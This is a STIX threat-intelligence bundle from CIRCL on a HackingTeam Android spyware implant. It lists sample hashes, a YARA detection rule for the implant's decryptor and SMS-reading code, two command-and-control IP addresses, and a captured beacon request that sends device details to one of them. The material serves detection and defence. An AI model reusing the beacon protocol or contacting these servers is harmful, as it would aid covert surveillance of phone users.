{
"type": "bundle",
"id": "bundle--582adfcb-6640-46bf-ba1f-4aca950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:43:55.000Z",
"modified": "2016-11-15T10:43:55.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--582adfcb-6640-46bf-ba1f-4aca950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:43:55.000Z",
"modified": "2016-11-15T10:43:55.000Z",
"name": "OSINT - HackingTeam back for your Androids, now extra insecure!",
"published": "2016-11-15T10:44:39Z",
"object_refs": [
"observed-data--582adfde-3f7c-47f7-82ac-4146950d210f",
"url--582adfde-3f7c-47f7-82ac-4146950d210f",
"indicator--582ae025-fbc0-4426-b31c-4f6d950d210f",
"indicator--582ae025-9014-49d4-8258-43e3950d210f",
"indicator--582ae025-8698-43d4-b114-41bb950d210f",
"indicator--582ae026-de30-4ef7-a4b9-49ca950d210f",
"indicator--582ae5ec-8338-4d70-84bc-435e02de0b81",
"indicator--582ae5ec-addc-4442-928a-427e02de0b81",
"observed-data--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
"url--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
"indicator--582ae5ed-3c64-48ad-b8bb-4b3e02de0b81",
"indicator--582ae5ed-c588-46b4-8052-40a402de0b81",
"observed-data--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
"url--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
"indicator--582ae5ed-5080-4e70-b5e4-4e0302de0b81",
"indicator--582ae5ee-a844-4b86-9e4e-449f02de0b81",
"observed-data--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
"url--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
"indicator--582ae5ee-97cc-4e28-8b99-45c702de0b81",
"indicator--582ae5ee-4ef4-44ab-9022-46fa02de0b81",
"observed-data--582ae5ee-9580-4da9-9118-48ad02de0b81",
"url--582ae5ee-9580-4da9-9118-48ad02de0b81",
"indicator--582ae62d-3180-4824-b898-40af950d210f",
"indicator--582ae678-60f4-49dd-9680-4533950d210f",
"indicator--582ae695-7fd8-4183-b00e-484f950d210f",
"x-misp-attribute--582ae6df-a770-49ef-ad0b-4c77950d210f"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"osint:source-type=\"blog-post\"",
"ms-caro-malware:malware-platform=\"AndroidOS\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--582adfde-3f7c-47f7-82ac-4146950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:13:50.000Z",
"modified": "2016-11-15T10:13:50.000Z",
"first_observed": "2016-11-15T10:13:50Z",
"last_observed": "2016-11-15T10:13:50Z",
"number_observed": 1,
"object_refs": [
"url--582adfde-3f7c-47f7-82ac-4146950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--582adfde-3f7c-47f7-82ac-4146950d210f",
"value": "http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae025-fbc0-4426-b31c-4f6d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:15:01.000Z",
"modified": "2016-11-15T10:15:01.000Z",
"pattern": "[file:hashes.SHA256 = '07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:15:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae025-9014-49d4-8258-43e3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:15:01.000Z",
"modified": "2016-11-15T10:15:01.000Z",
"pattern": "[file:hashes.SHA256 = 'ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:15:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae025-8698-43d4-b114-41bb950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:15:01.000Z",
"modified": "2016-11-15T10:15:01.000Z",
"pattern": "[file:hashes.SHA256 = 'e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:15:01Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae026-de30-4ef7-a4b9-49ca950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:15:02.000Z",
"modified": "2016-11-15T10:15:02.000Z",
"pattern": "[file:hashes.SHA256 = '87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:15:02Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ec-8338-4d70-84bc-435e02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:40.000Z",
"modified": "2016-11-15T10:39:40.000Z",
"description": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
"pattern": "[file:hashes.SHA1 = '03ea8043d16ecb9a462cc99d26b80889671e7621']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:40Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ec-addc-4442-928a-427e02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:40.000Z",
"modified": "2016-11-15T10:39:40.000Z",
"description": "- Xchecked via VT: 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
"pattern": "[file:hashes.MD5 = 'badbbb8189d3aa6d0352bf8a02c1e79d']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:40Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:40.000Z",
"modified": "2016-11-15T10:39:40.000Z",
"first_observed": "2016-11-15T10:39:40Z",
"last_observed": "2016-11-15T10:39:40Z",
"number_observed": 1,
"object_refs": [
"url--582ae5ec-7c10-4df6-bda2-4d6002de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--582ae5ec-7c10-4df6-bda2-4d6002de0b81",
"value": "https://www.virustotal.com/file/87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c/analysis/1479180111/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ed-3c64-48ad-b8bb-4b3e02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:41.000Z",
"modified": "2016-11-15T10:39:41.000Z",
"description": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c",
"pattern": "[file:hashes.SHA1 = 'a65f80a623269307067416225ce2a6cfc0557ac4']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:41Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ed-c588-46b4-8052-40a402de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:41.000Z",
"modified": "2016-11-15T10:39:41.000Z",
"description": "- Xchecked via VT: e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c",
"pattern": "[file:hashes.MD5 = 'cbd1c2db9ffc6b67cea46d271594c2ae']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:41Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:41.000Z",
"modified": "2016-11-15T10:39:41.000Z",
"first_observed": "2016-11-15T10:39:41Z",
"last_observed": "2016-11-15T10:39:41Z",
"number_observed": 1,
"object_refs": [
"url--582ae5ed-7e94-4dfd-8e88-45be02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--582ae5ed-7e94-4dfd-8e88-45be02de0b81",
"value": "https://www.virustotal.com/file/e362a037e70517565d28ab85959e6c9d231b2baf0c2df3b87dfaa1451278e80c/analysis/1479180040/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ed-5080-4e70-b5e4-4e0302de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:41.000Z",
"modified": "2016-11-15T10:39:41.000Z",
"description": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818",
"pattern": "[file:hashes.SHA1 = 'f60c545f08c74de317458c416a8768835bafe41b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:41Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ee-a844-4b86-9e4e-449f02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:42.000Z",
"modified": "2016-11-15T10:39:42.000Z",
"description": "- Xchecked via VT: ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818",
"pattern": "[file:hashes.MD5 = '3c1055f19971d580ef9ced172d8eba3b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:42.000Z",
"modified": "2016-11-15T10:39:42.000Z",
"first_observed": "2016-11-15T10:39:42Z",
"last_observed": "2016-11-15T10:39:42Z",
"number_observed": 1,
"object_refs": [
"url--582ae5ee-92e0-45eb-9e4d-40f202de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--582ae5ee-92e0-45eb-9e4d-40f202de0b81",
"value": "https://www.virustotal.com/file/ed33b83be3af715d3fd8ba6ac8b2b551a16697c5a37a9fcebfc40a024cc9b818/analysis/1477481986/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ee-97cc-4e28-8b99-45c702de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:42.000Z",
"modified": "2016-11-15T10:39:42.000Z",
"description": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31",
"pattern": "[file:hashes.SHA1 = 'c0802514739173623a319db4551f88d2ca71bdb2']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae5ee-4ef4-44ab-9022-46fa02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:42.000Z",
"modified": "2016-11-15T10:39:42.000Z",
"description": "- Xchecked via VT: 07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31",
"pattern": "[file:hashes.MD5 = '60f0c18fae934d1033394d62951d5dc8']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:39:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--582ae5ee-9580-4da9-9118-48ad02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:39:42.000Z",
"modified": "2016-11-15T10:39:42.000Z",
"first_observed": "2016-11-15T10:39:42Z",
"last_observed": "2016-11-15T10:39:42Z",
"number_observed": 1,
"object_refs": [
"url--582ae5ee-9580-4da9-9118-48ad02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--582ae5ee-9580-4da9-9118-48ad02de0b81",
"value": "https://www.virustotal.com/file/07278c56973d609caa5f9eb2393d9b1eb41964d24e7e9e7a7e7f9fdfb2bb4c31/analysis/1479179966/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae62d-3180-4824-b898-40af950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:40:45.000Z",
"modified": "2016-11-15T10:40:45.000Z",
"pattern": "[rule HackingTeam_Android : Android Implant\r\n{\r\n\tmeta:\r\n\t\tdescription = \"HackingTeam Android implant, known to detect version v4 - v7\"\r\n\t\tauthor = \"Tim 'diff' Strazzere <strazz@gmail.com>\"\r\n reference = \"http://rednaga.io/2016/11/14/hackingteam_back_for_your_androids/\"\r\n\t\tdate = \"2016-11-14\"\r\n\t\tversion = \"1.0\"\r\n strings:\r\n $decryptor = {\r\n 12 01 // const/4 v1, 0x0\r\n D8 00 ?? ?? // add-int/lit8 ??, ??, ??\r\n 6E 10 ?? ?? ?? 00 // invoke-virtual {??} -> String.toCharArray()\r\n 0C 04 // move-result-object v4\r\n 21 45 // array-length v5, v4\r\n 01 02 // move v2, v0\r\n 01 10 // move v0, v1\r\n 32 50 11 00 // if-eq v0, v5, 0xb\r\n 49 03 04 00 // aget-char v3, v4, v0\r\n DD 06 02 5F // and-int/lit8 v6, v2, 0x5f <- potentially change the hardcoded xor bit to ??\r\n B7 36 // xor-int/2addr v6, v3\r\n D8 03 02 ?? // and-int/lit8 v3, v2, ??\r\n D8 02 00 01 // and-int/lit8 v2, v0, 0x1\r\n 8E 66 // int-to-char v6, v6\r\n 50 06 04 00 // aput-char v6, v4, v0\r\n 01 20 // move v0, v2\r\n 01 32 // move v2, v3\r\n 28 F0 // goto 0xa\r\n 71 30 ?? ?? 14 05 // invoke-static {v4, v1, v5}, ?? -> String.valueOf()\r\n 0C 00 // move-result-object v0\r\n 6E 10 ?? ?? 00 00 // invoke-virtual {v0} ?? -> String.intern()\r\n 0C 00 // move-result-object v0\r\n 11 00 // return-object v0\r\n }\r\n // Below is the following string, however encoded as it would appear in the string table (length encoded, null byte padded)\r\n // Lcom/google/android/global/Settings;\r\n $settings = {\r\n 00 24 4C 63 6F 6D 2F 67 6F 6F 67 6C 65 2F 61 6E\r\n 64 72 6F 69 64 2F 67 6C 6F 62 61 6C 2F 53 65 74\r\n 74 69 6E 67 73 3B 00\r\n }\r\n // getSmsInputNumbers (Same encoded described above)\r\n $getSmsInputNumbers = {\r\n 00 12 67 65 74 53 6D 73 49 6E 70 75 74 4E 75 6D\r\n 62 65 72 73 00\r\n }\r\n condition:\r\n $decryptor and ($settings and $getSmsInputNumbers)\r\n}]",
"pattern_type": "yara",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:40:45Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae678-60f4-49dd-9680-4533950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:42:00.000Z",
"modified": "2016-11-15T10:42:00.000Z",
"description": "C2 for 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '68.233.237.11']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:42:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--582ae695-7fd8-4183-b00e-484f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:42:29.000Z",
"modified": "2016-11-15T10:42:29.000Z",
"description": "C2 for 87efe6a1cbf4d4481c6fa6e2c70a26a0b50a460557a1ad876af9966a571f8a4c",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '66.232.100.221']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-11-15T10:42:29Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--582ae6df-a770-49ef-ad0b-4c77950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-11-15T10:43:55.000Z",
"modified": "2016-11-15T10:43:55.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Network activity\""
],
"x_misp_category": "Network activity",
"x_misp_comment": "RequestActionsToExecute - Request",
"x_misp_type": "text",
"x_misp_value": "POST /UlisseREST/api/actions/RequestActionsToExecute HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/json\r\nAccept: application/json\r\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; BLU STUDIO 5.0 C Build/KOT49H)\r\nHost: 68.233.237.11\r\nAccept-Encoding: gzip\r\nContent-Length: 475\r\n{\"CommandLine\":\"\",\"CurrentDirectory\":\"\",\"Id\":\"8f4af21e-29fb-48e9-8b52-8cf87fcdec57\",\"LeaID\":\"00000000-0000-0000-0000-000000000000\",\"MachineName\":\"BLU BLU STUDIO 5.0 C BLU STUDIO 5.0 C IMEI: XXXXXXXXXXXXXXX IMSI: null\",\"OsType\":5,\"Platform\":\" Board:BLU STUDIO 5.0 C Brand:BLU Device:BLU STUDIO 5.0 C\",\"Version\":\"Release: 4.4.2 CodeName: REL Inc: eng.android.1441800693 SDK: 19\",\"ServicePack\":\"\",\"SystemDirectory\":\"\",\"UserDomainName\":\"\",\"UserName\":\"android\",\"ProcessorCount\":0}"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}